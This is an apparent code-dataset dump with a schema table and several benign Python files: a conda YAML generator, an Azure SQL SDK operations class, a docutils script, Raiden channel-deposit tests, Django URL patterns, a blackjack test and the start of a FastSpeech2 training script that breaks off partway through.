Dataset schema (column, dtype, observed range; ⌀ marks nullable columns):

| column | dtype | observed range | nullable |
|---|---|---|---|
| hexsha | string | lengths 40..40 | |
| size | int64 | 3..1.03M | |
| ext | string | 10 classes | |
| lang | string | 1 value | |
| max_stars_repo_path | string | lengths 3..972 | |
| max_stars_repo_name | string | lengths 6..130 | |
| max_stars_repo_head_hexsha | string | lengths 40..78 | |
| max_stars_repo_licenses | list | lengths 1..10 | |
| max_stars_count | int64 | 1..191k | ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24..24 | ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24..24 | ⌀ |
| max_issues_repo_path | string | lengths 3..972 | |
| max_issues_repo_name | string | lengths 6..130 | |
| max_issues_repo_head_hexsha | string | lengths 40..78 | |
| max_issues_repo_licenses | list | lengths 1..10 | |
| max_issues_count | int64 | 1..116k | ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24..24 | ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24..24 | ⌀ |
| max_forks_repo_path | string | lengths 3..972 | |
| max_forks_repo_name | string | lengths 6..130 | |
| max_forks_repo_head_hexsha | string | lengths 40..78 | |
| max_forks_repo_licenses | list | lengths 1..10 | |
| max_forks_count | int64 | 1..105k | ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24..24 | ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24..24 | ⌀ |
| content | string | lengths 3..1.03M | |
| avg_line_length | float64 | 1.13..941k | |
| max_line_length | int64 | 2..941k | |
| alphanum_fraction | float64 | 0..1 | |
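
A minimal consumption sketch for rows with this schema, assuming they come from a Hugging Face dataset (the dataset path below is a placeholder, not taken from this dump); streaming avoids materializing the large content column:

from datasets import load_dataset

def iter_python_files(dataset_path="<dataset-path>", split="train"):
    # Yield (path, content) pairs for rows of a dataset with the schema above.
    ds = load_dataset(dataset_path, split=split, streaming=True)
    for row in ds:
        if row["lang"] == "Python":
            yield row["max_stars_repo_path"], row["content"]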
hexsha: 79e4261b270b2f4b4da8adf6d55060619b3bf568 | size: 5,664 | ext: py | lang: Python
max_stars:  tools/generate_conda_file.py | awesome-archive/nlp-2 @ 79bc954601642679cf19e3750a1ee0b0f1b66b62 | ["MIT"] | count: 2 | events: 2020-01-06T05:44:03.000Z .. 2020-06-15T18:10:09.000Z
max_issues: tools/generate_conda_file.py | CharlotteSean/nlp-1 @ 79bc954601642679cf19e3750a1ee0b0f1b66b62 | ["MIT"] | count: null | events: null
max_forks:  tools/generate_conda_file.py | CharlotteSean/nlp-1 @ 79bc954601642679cf19e3750a1ee0b0f1b66b62 | ["MIT"] | count: null | events: null
#!/usr/bin/python
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# This script creates YAML files for building conda environments.
# To generate a conda file for running CPU-only Python code:
#    $ python generate_conda_file.py
#
# To generate a conda file for running Python code with GPU support:
#    $ python generate_conda_file.py --gpu
import argparse
import textwrap
from sys import platform
HELP_MSG = """
To create the conda environment:
$ conda env create -f {conda_env}.yaml
To update the conda environment:
$ conda env update -f {conda_env}.yaml
To register the conda environment in Jupyter:
$ conda activate {conda_env}
$ python -m ipykernel install --user --name {conda_env} \
--display-name "Python ({conda_env})"
"""
CHANNELS = ["defaults", "conda-forge", "pytorch"]
CONDA_BASE = {
"python": "python==3.6.8",
"pip": "pip>=19.1.1",
"ipykernel": "ipykernel>=4.6.1",
"jupyter": "jupyter>=1.0.0",
"matplotlib": "matplotlib>=2.2.2",
"numpy": "numpy>=1.13.3",
"pandas": "pandas>=0.24.2",
"pytest": "pytest>=3.6.4",
"pytorch": "pytorch-cpu>=1.0.0",
"scipy": "scipy>=1.0.0",
"tensorflow": "tensorflow==1.12.0",
"h5py": "h5py>=2.8.0",
"tensorflow-hub": "tensorflow-hub==0.5.0",
"py-xgboost": "py-xgboost<=0.80",
"dask": "dask[dataframe]==1.2.2",
}
CONDA_GPU = {
"numba": "numba>=0.38.1",
"pytorch": "pytorch>=1.0.0",
"tensorflow": "tensorflow-gpu==1.12.0",
"cudatoolkit": "cudatoolkit==9.2"
}
PIP_BASE = {
"allennlp": "allennlp==0.8.4",
"azureml-sdk[automl]": "azureml-sdk[automl]==1.0.48",
"azureml-train-automl": "azureml-train-automl==1.0.48",
"azureml-dataprep": "azureml-dataprep==1.1.8",
"azureml-widgets": "azureml-widgets==1.0.48",
"azureml-mlflow": "azureml-mlflow>=1.0.43.1",
"black": "black>=18.6b4",
"cached-property": "cached-property==1.5.1",
"papermill": "papermill>=1.0.1",
"nteract-scrapbook": "nteract-scrapbook>=0.2.1",
"pydocumentdb": "pydocumentdb>=2.3.3",
"pytorch-pretrained-bert": "pytorch-pretrained-bert>=0.6",
"tqdm": "tqdm==4.31.1",
"pyemd": "pyemd==0.5.1",
"ipywebrtc": "ipywebrtc==0.4.3",
"pre-commit": "pre-commit>=1.14.4",
"scikit-learn": "scikit-learn>=0.19.0,<=0.20.3",
"setuptools_scm": "setuptools_scm==3.2.0",
"sklearn-crfsuite": "sklearn-crfsuite>=0.3.6",
"spacy": "spacy>=2.1.4",
"spacy-models": (
"https://github.com/explosion/spacy-models/releases/download/"
"en_core_web_sm-2.1.0/en_core_web_sm-2.1.0.tar.gz"
),
"gensim": "gensim>=3.7.0",
"nltk": "nltk>=3.4",
"seqeval": "seqeval>=0.0.12",
}
PIP_GPU = {}
PIP_DARWIN = {}
PIP_DARWIN_GPU = {}
PIP_LINUX = {}
PIP_LINUX_GPU = {}
PIP_WIN32 = {}
PIP_WIN32_GPU = {}
CONDA_DARWIN = {}
CONDA_DARWIN_GPU = {}
CONDA_LINUX = {}
CONDA_LINUX_GPU = {}
CONDA_WIN32 = {}
CONDA_WIN32_GPU = {"pytorch": "pytorch==1.0.0", "cudatoolkit": "cuda90"}
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=textwrap.dedent(
"""
This script generates a conda file for different environments.
Plain python is the default,
but flags can be used to support GPU functionality."""
),
epilog=HELP_MSG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--name", help="specify name of conda environment")
parser.add_argument("--gpu", action="store_true", help="include packages for GPU support")
args = parser.parse_args()
# set name for environment and output yaml file
conda_env = "nlp_cpu"
if args.gpu:
conda_env = "nlp_gpu"
# overwrite environment name with user input
if args.name is not None:
conda_env = args.name
    # add conda and pip base packages (copies, so the module-level dicts are not mutated)
    conda_packages = CONDA_BASE.copy()
    pip_packages = PIP_BASE.copy()
# update conda and pip packages based on flags provided
if args.gpu:
conda_packages.update(CONDA_GPU)
pip_packages.update(PIP_GPU)
# update conda and pip packages based on os platform support
if platform == "darwin":
conda_packages.update(CONDA_DARWIN)
pip_packages.update(PIP_DARWIN)
if args.gpu:
conda_packages.update(CONDA_DARWIN_GPU)
pip_packages.update(PIP_DARWIN_GPU)
elif platform.startswith("linux"):
conda_packages.update(CONDA_LINUX)
pip_packages.update(PIP_LINUX)
if args.gpu:
conda_packages.update(CONDA_LINUX_GPU)
pip_packages.update(PIP_LINUX_GPU)
elif platform == "win32":
conda_packages.update(CONDA_WIN32)
pip_packages.update(PIP_WIN32)
if args.gpu:
conda_packages.update(CONDA_WIN32_GPU)
pip_packages.update(PIP_WIN32_GPU)
else:
raise Exception("Unsupported platform. Must be Windows, Linux, or macOS")
# write out yaml file
conda_file = "{}.yaml".format(conda_env)
with open(conda_file, "w") as f:
for line in HELP_MSG.format(conda_env=conda_env).split("\n"):
f.write("# {}\n".format(line))
f.write("name: {}\n".format(conda_env))
f.write("channels:\n")
for channel in CHANNELS:
f.write("- {}\n".format(channel))
f.write("dependencies:\n")
for conda_package in conda_packages.values():
f.write("- {}\n".format(conda_package))
f.write("- pip:\n")
for pip_package in pip_packages.values():
f.write(" - {}\n".format(pip_package))
print("Generated conda file: {}".format(conda_file))
print(HELP_MSG.format(conda_env=conda_env))
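# For reference, a sketch of the YAML this script emits in the default CPU case
# (the HELP_MSG banner is written as a comment header above these lines; the
# dependency list below is abbreviated):
#
#   name: nlp_cpu
#   channels:
#   - defaults
#   - conda-forge
#   - pytorch
#   dependencies:
#   - python==3.6.8
#   - pip>=19.1.1
#   - ...
#   - pip:
#     - allennlp==0.8.4
#     - ...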
avg_line_length: 31.466667 | max_line_length: 94 | alphanum_fraction: 0.634887
hexsha: ec34c61315c6598602f1ffdc06f206297bf32f3e | size: 6,722 | ext: py | lang: Python
max_stars:  sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py | rsdoherty/azure-sdk-for-python @ 6bba5326677468e6660845a703686327178bb7b1 | ["MIT"] | count: 3 | events: 2020-06-23T02:25:27.000Z .. 2021-09-07T18:48:11.000Z
max_issues: sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py | rsdoherty/azure-sdk-for-python @ 6bba5326677468e6660845a703686327178bb7b1 | ["MIT"] | count: 510 | events: 2019-07-17T16:11:19.000Z .. 2021-08-02T08:38:32.000Z
max_forks:  sdk/sql/azure-mgmt-sql/azure/mgmt/sql/operations/_transparent_data_encryption_activities_operations.py | rsdoherty/azure-sdk-for-python @ 6bba5326677468e6660845a703686327178bb7b1 | ["MIT"] | count: 5 | events: 2019-09-04T12:51:37.000Z .. 2020-09-16T07:28:40.000Z
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class TransparentDataEncryptionActivitiesOperations(object):
"""TransparentDataEncryptionActivitiesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.sql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_configuration(
self,
resource_group_name, # type: str
server_name, # type: str
database_name, # type: str
transparent_data_encryption_name, # type: Union[str, "_models.TransparentDataEncryptionName"]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TransparentDataEncryptionActivityListResult"]
"""Returns a database's transparent data encryption operation result.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:param database_name: The name of the database for which the transparent data encryption
applies.
:type database_name: str
:param transparent_data_encryption_name: The name of the transparent data encryption
configuration.
:type transparent_data_encryption_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TransparentDataEncryptionActivityListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.TransparentDataEncryptionActivityListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TransparentDataEncryptionActivityListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2014-04-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'transparentDataEncryptionName': self._serialize.url("transparent_data_encryption_name", transparent_data_encryption_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('TransparentDataEncryptionActivityListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/transparentDataEncryption/{transparentDataEncryptionName}/operationResults'} # type: ignore
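# A minimal usage sketch (an assumption for illustration, not part of the generated file):
# this operations class is reached through a SqlManagementClient attribute rather than
# instantiated directly. Credential setup and resource names below are placeholders.
#   from azure.identity import DefaultAzureCredential
#   from azure.mgmt.sql import SqlManagementClient
#   client = SqlManagementClient(DefaultAzureCredential(), "<subscription-id>")
#   for activity in client.transparent_data_encryption_activities.list_by_configuration(
#           resource_group_name="<resource-group>",
#           server_name="<server>",
#           database_name="<database>",
#           transparent_data_encryption_name="current"):
#       print(activity)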
avg_line_length: 50.541353 | max_line_length: 275 | alphanum_fraction: 0.677328
hexsha: 35bd7fa805e8dffba1a9697f611b74ef6e403598 | size: 855 | ext: py | lang: Python
max_stars:  trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py | thinkbase/PortableTrac @ 9ea0210f6b88f135ef73f370b48127af0495b2d7 | ["BSD-3-Clause"] | count: 2 | events: 2015-08-06T04:19:21.000Z .. 2020-04-29T23:52:10.000Z
max_issues: trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py | thinkbase/PortableTrac @ 9ea0210f6b88f135ef73f370b48127af0495b2d7 | ["BSD-3-Clause"] | count: null | events: null
max_forks:  trac/Lib/site-packages/docutils-0.9.1-py2.7.egg/EGG-INFO/scripts/rst2latex.py | thinkbase/PortableTrac @ 9ea0210f6b88f135ef73f370b48127af0495b2d7 | ["BSD-3-Clause"] | count: null | events: null
#!E:\PortableTrac\Portable Python 2.7.3.1\App\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
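# Usage sketch (illustrative; filenames are assumptions): as a command-line front end,
#   $ rst2latex.py document.rst document.tex
# or the equivalent programmatic call through the Docutils Publisher:
#   from docutils.core import publish_file
#   publish_file(source_path="document.rst", destination_path="document.tex",
#                writer_name="latex")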
avg_line_length: 31.666667 | max_line_length: 77 | alphanum_fraction: 0.653801
hexsha: d915a4cb5b66660b42ea11c330e40d68f99bd71d | size: 10,406 | ext: py | lang: Python
max_stars:  raiden_contracts/tests/test_channel_deposit.py | marcosmartinez7/lumino-contracts @ 700d6cb6b4c90d0173b3d206238fd31a02dcb9bd | ["MIT"] | count: 3 | events: 2019-06-12T14:50:12.000Z .. 2020-12-25T07:25:23.000Z
max_issues: raiden_contracts/tests/test_channel_deposit.py | marcosmartinez7/lumino-contracts @ 700d6cb6b4c90d0173b3d206238fd31a02dcb9bd | ["MIT"] | count: 2 | events: 2019-12-08T21:06:56.000Z .. 2021-01-21T02:44:58.000Z
max_forks:  raiden_contracts/tests/test_channel_deposit.py | marcosmartinez7/lumino-contracts @ 700d6cb6b4c90d0173b3d206238fd31a02dcb9bd | ["MIT"] | count: 5 | events: 2019-06-12T14:02:07.000Z .. 2020-12-10T11:21:37.000Z
import pytest
from eth_tester.exceptions import TransactionFailed
from web3.exceptions import ValidationError
from raiden_contracts.constants import TEST_SETTLE_TIMEOUT_MIN, ChannelEvent
from raiden_contracts.tests.fixtures.channel import call_settle
from raiden_contracts.tests.utils import (
EMPTY_ADDITIONAL_HASH,
EMPTY_ADDRESS,
EMPTY_BALANCE_HASH,
EMPTY_SIGNATURE,
FAKE_ADDRESS,
MAX_UINT256,
ChannelValues,
)
from raiden_contracts.utils.events import check_new_deposit
def test_deposit_channel_call(token_network, custom_token, create_channel, get_accounts):
""" Calling setTotalDeposit() fails with various invalid inputs """
(A, B) = get_accounts(2)
deposit_A = 200
channel_identifier = create_channel(A, B)[0]
custom_token.functions.mint(deposit_A).call_and_transact({"from": A})
custom_token.functions.approve(token_network.address, deposit_A).call_and_transact({"from": A})
# Validation failure with an invalid channel identifier
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(-1, A, deposit_A, B)
# Validation failure with the empty string instead of a channel identifier
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit("", A, deposit_A, B)
# Validation failure with a negative number instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, -1, A, deposit_A)
# Validation failure with an empty string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, "", deposit_A, B)
# Validation failure with an odd-length string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, FAKE_ADDRESS, deposit_A, B)
# Validation failure with the number zero instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, 0x0, deposit_A, B)
# Validation failure with the empty string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, "")
# Validation failure with an odd-length string instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, FAKE_ADDRESS)
# Validation failure with the number zero instead of an address
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, 0x0)
# Validation failure with a negative amount of deposit
with pytest.raises(ValidationError):
token_network.functions.setTotalDeposit(channel_identifier, A, -1, B)
# Transaction failure with the zero address
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(
channel_identifier, EMPTY_ADDRESS, deposit_A, B
).call({"from": A})
# Transaction failure with the zero address
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(
channel_identifier, A, deposit_A, EMPTY_ADDRESS
).call({"from": A})
# Transaction failure with zero total deposit
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 0, B).call({"from": A})
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, B)
def test_deposit_notapproved(token_network, custom_token, create_channel, get_accounts, web3):
""" Calling setTotalDeposit() fails without approving transfers on the token contract """
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
deposit_A = 1
custom_token.functions.mint(deposit_A).call_and_transact({"from": A})
web3.testing.mine(1)
balance = custom_token.functions.balanceOf(A).call()
assert balance >= deposit_A, f"minted {deposit_A} but the balance is still {balance}"
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, deposit_A, B).call(
{"from": A}
)
def test_null_or_negative_deposit_fail(
token_network, create_channel, channel_deposit, assign_tokens, get_accounts
):
""" setTotalDeposit() fails when the total deposit does not increase """
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, 2, B)
assign_tokens(A, 1)
# setTotalDeposit is idempotent
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 2, B).call({"from": A})
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 1, B).call({"from": A})
def test_deposit_delegate_works(get_accounts, create_channel, channel_deposit):
""" A third party can successfully call setTokenDeposit() """
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, 2, B, tx_from=C)
def test_deposit_wrong_channel(get_accounts, token_network, create_channel, assign_tokens):
""" setTotalDeposit() with a wrong channelID fails """
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_identifier2 = create_channel(A, C)[0]
assign_tokens(A, 10)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier2, A, 10, B).call({"from": A})
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, 10, C).call({"from": A})
token_network.functions.setTotalDeposit(channel_identifier, A, 10, B).call_and_transact(
{"from": A}
)
@pytest.mark.skip("Not necessary with limited deposits for the test release.")
def test_channel_deposit_overflow(get_accounts, create_channel, channel_deposit):
(A, B) = get_accounts(2)
deposit_A = 50
deposit_B_ok = MAX_UINT256 - deposit_A
deposit_B_fail = deposit_B_ok + 1
channel_identifier = create_channel(A, B)[0]
channel_deposit(channel_identifier, A, deposit_A, B)
with pytest.raises(TransactionFailed):
channel_deposit(channel_identifier, B, deposit_B_fail, A)
channel_deposit(channel_identifier, B, deposit_B_ok, A)
def test_deposit_channel_state(token_network, create_channel, channel_deposit, get_accounts):
""" Observe how setTotalDeposit() changes the results of getChannelParticipantInfo() """
(A, B) = get_accounts(2)
deposit_A = 10
deposit_B = 15
channel_identifier = create_channel(A, B)[0]
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == 0
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == 0
channel_deposit(channel_identifier, A, deposit_A, B)
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == deposit_A
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == 0
channel_deposit(channel_identifier, B, deposit_B, A)
A_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, A, B).call()[
0
]
assert A_deposit == deposit_A
B_deposit = token_network.functions.getChannelParticipantInfo(channel_identifier, B, A).call()[
0
]
assert B_deposit == deposit_B
def test_deposit_wrong_state_fail(
web3, get_accounts, token_network, create_channel, assign_tokens
):
""" setTotalDeposit() fails on Closed or Settled channels. """
(A, B) = get_accounts(2)
vals_A = ChannelValues(deposit=2, transferred=0)
vals_B = ChannelValues(deposit=2, transferred=0)
channel_identifier = create_channel(A, B, TEST_SETTLE_TIMEOUT_MIN)[0]
assign_tokens(A, vals_A.deposit)
assign_tokens(B, vals_B.deposit)
token_network.functions.setTotalDeposit(
channel_identifier, A, vals_A.deposit, B
).call_and_transact({"from": A})
token_network.functions.setTotalDeposit(
channel_identifier, B, vals_B.deposit, A
).call_and_transact({"from": B})
token_network.functions.closeChannel(
channel_identifier, B, EMPTY_BALANCE_HASH, 0, EMPTY_ADDITIONAL_HASH, EMPTY_SIGNATURE
).call_and_transact({"from": A})
assign_tokens(A, 10)
assign_tokens(B, 10)
vals_A.deposit += 5
vals_B.deposit += 5
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, vals_A.deposit, B).call(
{"from": A}
)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, B, vals_B.deposit, A).call(
{"from": B}
)
web3.testing.mine(TEST_SETTLE_TIMEOUT_MIN + 1)
call_settle(token_network, channel_identifier, A, vals_A, B, vals_B)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, A, vals_A.deposit, B).call(
{"from": A}
)
with pytest.raises(TransactionFailed):
token_network.functions.setTotalDeposit(channel_identifier, B, vals_B.deposit, A).call(
{"from": B}
)
def test_deposit_channel_event(
get_accounts, token_network, create_channel, channel_deposit, event_handler
):
""" setTotalDeposit() from each participant causes a DEPOSIT event """
ev_handler = event_handler(token_network)
(A, B) = get_accounts(2)
deposit_A = 10
deposit_B = 15
channel_identifier = create_channel(A, B)[0]
txn_hash = channel_deposit(channel_identifier, A, deposit_A, B)
ev_handler.add(
txn_hash, ChannelEvent.DEPOSIT, check_new_deposit(channel_identifier, A, deposit_A)
)
txn_hash = channel_deposit(channel_identifier, B, deposit_B, A)
ev_handler.add(
txn_hash, ChannelEvent.DEPOSIT, check_new_deposit(channel_identifier, B, deposit_B)
)
ev_handler.check()
avg_line_length: 40.333333 | max_line_length: 99 | alphanum_fraction: 0.729483
hexsha: be3f9dcbafff128209385ef43a17145e5918b3d4 | size: 780 | ext: py | lang: Python
max_stars:  tastypie_swagger/urls.py | pierrealixt/django-tastypie-swagger @ 9461803253cd2653f402ec8233606a4cc8c1113f | ["Apache-2.0"] | count: null | events: null
max_issues: tastypie_swagger/urls.py | pierrealixt/django-tastypie-swagger @ 9461803253cd2653f402ec8233606a4cc8c1113f | ["Apache-2.0"] | count: null | events: null
max_forks:  tastypie_swagger/urls.py | pierrealixt/django-tastypie-swagger @ 9461803253cd2653f402ec8233606a4cc8c1113f | ["Apache-2.0"] | count: 2 | events: 2017-10-05T22:50:35.000Z .. 2020-07-15T13:07:20.000Z
from .views import SwaggerView, ResourcesView, SchemaView
try:
    # Django >= 1.4 exposes url/include from django.conf.urls
    from django.conf.urls import include, url
urlpatterns = [
url(r'^$', SwaggerView.as_view(), name='index'),
url(r'^resources/$', ResourcesView.as_view(), name='resources'),
url(r'^schema/(?P<resource>\S+)$', SchemaView.as_view()),
url(r'^schema/$', SchemaView.as_view(), name='schema'),
]
except ImportError:
    # fallback for older Django, where the helpers live in django.conf.urls.defaults
    from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('',
url(r'^$', SwaggerView.as_view(), name='index'),
url(r'^resources/$', ResourcesView.as_view(), name='resources'),
url(r'^schema/(?P<resource>\S+)$', SchemaView.as_view()),
url(r'^schema/$', SchemaView.as_view(), name='schema'),
)
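# A minimal wiring sketch (an assumption for illustration, not part of this file):
# these patterns are typically mounted from a project-level urls.py, e.g.
#   url(r'^api/doc/', include('tastypie_swagger.urls', namespace='tastypie_swagger')),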
avg_line_length: 37.142857 | max_line_length: 72 | alphanum_fraction: 0.621795
hexsha: a1f7f642e0f102e6d7f2e97e8a5a33cb0e8eba7f | size: 777 | ext: py | lang: Python
max_stars:  tests/test3.py | akaeme/BlackJackBot @ 04970107202a24059f8da933233fba7df9f3a0ef | ["MIT"] | count: null | events: null
max_issues: tests/test3.py | akaeme/BlackJackBot @ 04970107202a24059f8da933233fba7df9f3a0ef | ["MIT"] | count: null | events: null
max_forks:  tests/test3.py | akaeme/BlackJackBot @ 04970107202a24059f8da933233fba7df9f3a0ef | ["MIT"] | count: null | events: null
#encoding: utf8
import sys
sys.path.insert(0,"..")
from game import Game
from player import Player
from card import Card
from test_shoe import TestShoe
class TestPlayer(Player):
def __init__(self, name="TestPlayer", money=0, default_bet=1):
super(TestPlayer, self).__init__(name, money)
self.default_bet = default_bet
def play(self, dealer, players):
return "h"
def bet(self, dealer, players):
return self.default_bet
if __name__ == '__main__':
players = [TestPlayer("test",100)]
print(players)
g = Game(players, debug=True, shoe=TestShoe([Card(0,1), Card(0,12), Card(1,1), Card(1,12)] ))
g.run()
print("OVERALL: ", players)
if str(players) == "[test (100€)]":
sys.exit(0)
sys.exit(1)
avg_line_length: 24.28125 | max_line_length: 98 | alphanum_fraction: 0.638353
hexsha: 8396e9db010540e847fd1463a4af9684f0f45fc8 | size: 12,478 | ext: py | lang: Python
max_stars:  train.py | MckinstryJ/FastSpeech2_LJSpeech @ bcc45d2804d3859a51de979c24d208cf0142c74e | ["MIT"] | count: 5 | events: 2021-08-28T17:07:10.000Z .. 2022-02-09T15:53:53.000Z
max_issues: train.py | MckinstryJ/FastSpeech2_LJSpeech @ bcc45d2804d3859a51de979c24d208cf0142c74e | ["MIT"] | count: null | events: null
max_forks:  train.py | MckinstryJ/FastSpeech2_LJSpeech @ bcc45d2804d3859a51de979c24d208cf0142c74e | ["MIT"] | count: 1 | events: 2022-02-10T02:01:31.000Z .. 2022-02-10T02:01:31.000Z
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
import numpy as np
import argparse
import os
import time
from fastspeech2 import FastSpeech2
from loss import FastSpeech2Loss
from dataset import Dataset
from optimizer import ScheduledOptim
from evaluate import evaluate
import hparams as hp
import utils
import audio as Audio
'''
Notes:
    - A few packages have to be installed before train.py can be run.
    - Once installed, a PermissionError shows up... will work on it on Sunday.
'''
def main(args):
torch.manual_seed(0)
# Get device
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Get dataset
dataset = Dataset("train.txt")
loader = DataLoader(dataset, batch_size=hp.batch_size**2, shuffle=True,
collate_fn=dataset.collate_fn, drop_last=True, num_workers=0)
# Define model
model = nn.DataParallel(FastSpeech2()).to(device)
print("Model Has Been Defined")
